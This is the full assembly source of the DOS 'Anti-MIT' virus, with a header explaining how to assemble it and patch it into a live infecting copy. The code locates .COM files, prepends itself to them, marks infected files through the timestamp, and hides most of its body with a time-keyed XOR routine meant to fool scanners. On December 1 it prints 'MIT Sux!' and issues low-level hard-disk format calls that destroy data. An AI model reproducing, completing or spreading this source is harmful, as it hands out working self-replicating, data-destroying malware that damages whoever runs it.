;                          **  Anti-MIT Virus **
;       To assemble, use TASM and TLINK to create a .COM file. Next
;    run the .COM file in the same directory of a file you want to infect.
;    Your system may hang, but after re-booting you will notice an increase
;    in the target files size. Now debug the newly infected file and replace
;    the first three bytes with E8 05 00 (call to encryption). Re-write the
;    .COM file and now you should have a running copy of the Anti-Mit virus!
;
;                 - Do not distribute the Anti-MIT virus for this
;                 activity is against the law! The author will take
;                 NO responsiblity for others.
;                                 TEST ONLY
;
;                        For more info see MIT.DOX file.




name    AntiMIT
	title   Anti-MIT: The original Anti-MIT virus code! 
	.radix  16
code    segment
	assume  cs:code,ds:code
	org     100

buffer  equ     offset 20000d                 ; Buffer
fname   equ     offset 20000d + 1eh           ; DTA - File name
ftime   equ     offset 20000d + 16h           ; DTA - File time
fsize   equ     offset 20000d + 1ah           ; DTA - File size
olddta  equ     80                            ; Old DTA area

start:
	jmp     main                          ; *See above*
	nop
	jmp     main                          ; Jmp to virus body

encrypt_val     db      0                     ; Randomized encryption value

decrypt:                                      ; Encrypt/decrypt engine
encrypt:                                      ; [SKISM type]
     lea        si, data
     mov        ah, encrypt_val
     jmp        fool_em                       ; Fool with the scanners

xor_loop:
     lodsb                                    ; ds:[si] -> al
     xor     al, ah
     stosb                                    ; al -> es:[di]
     loop    xor_loop
     mov     ah,19h                           ; Set current drive as default
     int     21h
     mov     dh,al
     mov     ah,0eh
     int     21h
     ret                

fool_em:
     mov        di, si
     mov        cx, stop_encrypt - data
     jmp        xor_loop



data            label   byte                  ; Virus data
message         db      'MIT Sux! $'          ; The "message"
lengthp         dw      ?                     ; Length of infected file
allcom          db      '*.COM',0             ; What to search for
virus           db      '[Anti-MIT]',0        ; Virus name
author          db      'F�rs�Str�k�',0       ; Author

main:                                         ; Main virus code
	mov     ah,2ah                        ; Get the date
	int     21h
	 
	cmp     dh,12d                        ; Month 12?
	jnz     next                          ; No
	
	 
	cmp     dl,01d                        ; Day one?
	jnz     next                          ; No
	lea     dx,message                    ; Yes, set off the "bomb"
	mov     ah,09h
	int     21h

	mov     ah,05h
	mov     al,02h
	mov     ch,00h
	mov     dh,00h
	mov     dl,80h
	int     13h

	mov     ah,06h
	int     13h

	mov     ah,05h
	mov     dl,00h
	int     13h

	mov     ah,4ch                        ; Exit
	int     21h

next:
	mov     cx,lengthp                    ; Figure out the Jmp 
	sub     cx,eendcode-start
	mov     the_jmp,cx

	


	push    es                            ; Save ES
	mov     ax,3524h                      ; Get interrupt 24h handler
	int     21h                           ; and save it in errhnd
	mov     [err1],bx
	mov     [err2],es
	pop     es                            ; Restore ES

	mov     ax,2524h                      ; Set interrupt 24h handler
	lea     dx,handler
	int     21h

	xor     dx,dx                         ; Set DTA in "buffer" area
	mov     si,dx
	mov     dx,buffer
	add     dx,si                         ; Set new Disk Transfer Address
	mov     ah,1A                         ; Set DTA
	int     21


find_first:
	mov     dx,offset allcom              ; Search for '*.COM' files
	mov     cx,00000001b                  ; Normal, Write Protected
	mov     ah,4E                         ; Find First file
	int     21
	jc      pre_done                      ; Quit if none found
	jmp     check_if_ill
	   
mover:                                        ; The "mover" code
	push    cs                            ; Store CS
	pop     es                            ; and move it to ES
	mov     di,0100h                      
	lea     si,eendcode                   ; Move original code to 
	add     si,the_jmp                    ; beginning
	add     si,endcode-mover
	mov     cx,eendcode-start
	rep     movsb
	mov     di,0100h                      ; Jmp to CS:[100h]
	jmp     di

pre_done:
	jmp     done                          ; Long jmp

find_next:
	mov     ah,4fh                        ; Search for next
	int     21h
	jc      pre_done

check_if_ill:                                 ; File infected?
	mov     ax,cs:[ftime]
	and     al,11111b                     ; Look for the 62 sec marker
	cmp     al,62d/2                      ; [Vienna type]
	jz      find_next

	cmp     cs:[fsize],19000d             ; Check if file larger then 
	ja      find_next                     ; 19000 bytes - if so skip

	cmp     cs:[fsize],500d               ; Check if file smaller then
	jb      find_next                     ; 500 bytes - if so skip


mainlp:                                       ; Write the virus
	mov     dx,fname
	mov     ah,43h                        ; Write enable
	mov     al,0
	int     21h
	mov     ah,43h
	mov     al,01h
	and     cx,11111110b
	int     21h

	
	mov     ax,3d02h                      ; Open file (read/write)
	int     21h
	jc      pre_done
	mov     bx,ax

	mov     ax,5700h                      ; Get date for file
	int     21h
	mov     [time],cx                       ; Save date info
	mov     [date],dx

	mov     ah,3fh                        ; Read original code into 
	mov     dx,buffer                     ; buffer (length of virus)
	mov     cx,eendcode-start
	int     21h
	jc      pre_done
	cmp     ax,eendcode-start
	jne     pre_done


	mov     ah,42h                        ; Go to end of file
	mov     al,02h
	xor     cx,cx
	xor     dx,dx
	int     21h
	jc      pre_done
	mov     cx,ax
	mov     lengthp,ax                    ; Save original program code

	mov     ah,40h                        ; Write "mover" code to end   
	lea     dx,mover                      ; of file
	mov     cx,endcode-mover
	int     21h
	jc      done
	cmp     ax,endcode-mover
	jne     done

	mov     ah,40h                        ; Write original program code 
	mov     dx,buffer                     ; to end of the file
	mov     cx,eendcode-start
	int     21h
	jc      done
	cmp     ax,eendcode-start
	jne     done

	mov     ah,42h                        ; Go to front of file
	mov     al,00h
	xor     cx,cx
	xor     dx,dx
	int     21h
	jc      done
	
stop_encrypt:
	mov     ah,2ch                        ; Get time
	int     21h                           
	
	mov     encrypt_val,dh                ; Use time as random encryption
	call    encrypt                       ; value
	
	mov     ah,40h                        ; Write virus code to front of
	lea     dx,start                      ; file
	mov     cx,eendcode-start
	int     21h
	jc      done
	cmp     ax,eendcode-start
	jne     done
	jmp     date_stuff

handler:
	mov     al,0
	iret
endp


time    dw      ?                             ; File stamp - time
date    dw      ?                             ; File stamp - date
err1    dw      ?                             ; Original error handler 
err2    dw      ?                             ; address

date_stuff:                                   ; Restore old file stamp
	mov     ax,5701h       
	mov     cx,[time]
	mov     dx,[date]
	and     cl,not 11111b                 ; Set seconds field to 62 secs.
	or      cl,11111b
	int     21h
	mov     ah,3eh
	int     21h
	mov     dx,olddta                     ; Restore "original" DTA
	mov     ah,1ah
	int     21h

	push    ds                            ; Save DS
	mov     ax,2524h                      ; Set interrupt 24h handler
	mov     dx,err1                       ; Restore saved handler
	mov     dx,err2
	mov     ds,dx
	int     21h
	pop     ds                            ; Restore DS

done:
	xor     cx,cx                         ; Clear registors
	xor     dx,dx
	xor     bx,bx
	xor     ax,ax
	xor     si,si
jmp_code db     0e9h                          ; Preform jmp to "mover" code
the_jmp  dw     ?

go:
eendcode        label          byte

	nop                                   ; krap
	nop
	nop
	nop
	nop




endcode         label          byte












code    ends
	end     start